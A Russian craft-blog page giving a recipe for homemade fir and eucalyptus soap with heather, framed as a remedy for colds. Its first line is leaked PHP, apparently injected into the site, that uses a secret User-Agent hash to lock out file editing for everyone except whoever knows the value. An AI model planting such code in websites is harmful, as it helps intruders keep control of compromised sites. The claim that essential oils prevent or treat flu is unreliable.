if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт натурального мыла от простуды с ароматом пихты | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт натурального мыла от простуды с ароматом пихты

У меня всю жизнь был стереотип, что летом заболеть невозможно. Но после того, как я съела за раз 3 мороженого, он расстаял. Оказывается, что именно в это время года многие люди страдают от ангин, отитов, ОРВИ и прочих простудных заболеваний, что собственно и случилось со мной

У меня всю жизнь был сте­рео­тип, что летом забо­леть невоз­мож­но. Но после того, как я съе­ла за раз 3 моро­же­но­го, он рас­ста­ял. Ока­зы­ва­ет­ся, что имен­но в это вре­мя года мно­гие люди стра­да­ют от ангин, оти­тов, ОРВИ и про­чих про­студ­ных забо­ле­ва­ний, что соб­ствен­но и слу­чи­лось со мной 🙁 Вот поэто­му я и хочу поде­лить­ся рецеп­том, как сво­и­ми рука­ми сде­лать мыло с уди­ви­тель­ным хвой­ным аро­ма­том, обо­га­щен­ное эфир­ны­ми мас­ла­ми, кото­рые так часто исполь­зу­ют­ся для про­фи­лак­ти­ки и лече­ния грип­па и ОРВИ. Отвар сухо­цве­та верес­ка лишь уси­ли­ва­ет общий эффект.

Для при­го­тов­ле­ния мыла мы будем использовать:

  • Белая мыль­ная осно­ва 100 грамм
  • Смесь эфир­но­го мас­ла эвка­лип­та, пих­ты 1/2 чай­ной лож­ки и кед­ро­во­го масла
  • 1 сто­ло­вая лож­ка сухо­цве­та вереска
  • Круг­лая форма

Как это дела­ет­ся:

Нуж­но при­го­то­вить отвар верес­ка. Что­бы это сде­лать, надо залить сухо­цве­ты 100 мл. горя­чей воды и раз­ме­стить жид­кость в тер­мо­се. Спу­стя 2 часа необ­хо­ди­мо отвар про­це­дить. Затем насто­пи­те мыль­ную осно­ву на водя­ной бане до кон­си­стен­ции овся­ной каши.

Далее необ­хо­ди­мо доба­вить смесь эфир­но­го мас­ла и сто­ло­вую лож­ку верес­ка. Все это хоро­шень­ко перемешайте.

Поме­сти­те мыло в фор­моч­ку и оставь­те его, что­бы оно засты­ло при ком­нат­ной температуре.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!